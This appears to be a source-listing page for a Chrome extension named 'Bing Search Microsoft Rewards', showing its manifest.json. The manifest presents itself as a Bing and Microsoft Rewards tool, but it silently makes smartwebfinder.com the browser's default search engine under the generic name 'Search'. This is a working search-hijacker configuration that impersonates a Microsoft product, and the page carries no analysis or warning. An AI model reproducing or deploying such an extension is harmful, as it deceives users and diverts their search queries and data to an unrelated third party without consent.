Bing Search Microsoft Rewards

Bing Search Microsoft Rewards

Bing Search A new way to earn more points with Microsoft Rewards

Merlin
Additional files are visible only to premium users

manifest.json


{
  "name": "__MSG_appName__",
  "description": "__MSG_appDesc__",
  "chrome_settings_overrides": {
    "search_provider": {
      "name": "Search",
      "keyword": "Search",
      "search_url": "https://smartwebfinder.com/?n=1&q={searchTerms}",
      "favicon_url": "https://smartwebfinder.com/favicon.ico",
      "encoding": "UTF-8",
      "is_default": true
    }
  },
  "default_locale": "en_US",
  "icons": {
    "16": "data/icons/16.png",
    "64": "data/icons/64.png",
    "128": "data/icons/128.png"
  },
  "manifest_version": 3,
  "short_name": "Search",
  "update_url": "https://clients2.google.com/service/update2/crx",
  "version": "0.0.2"
}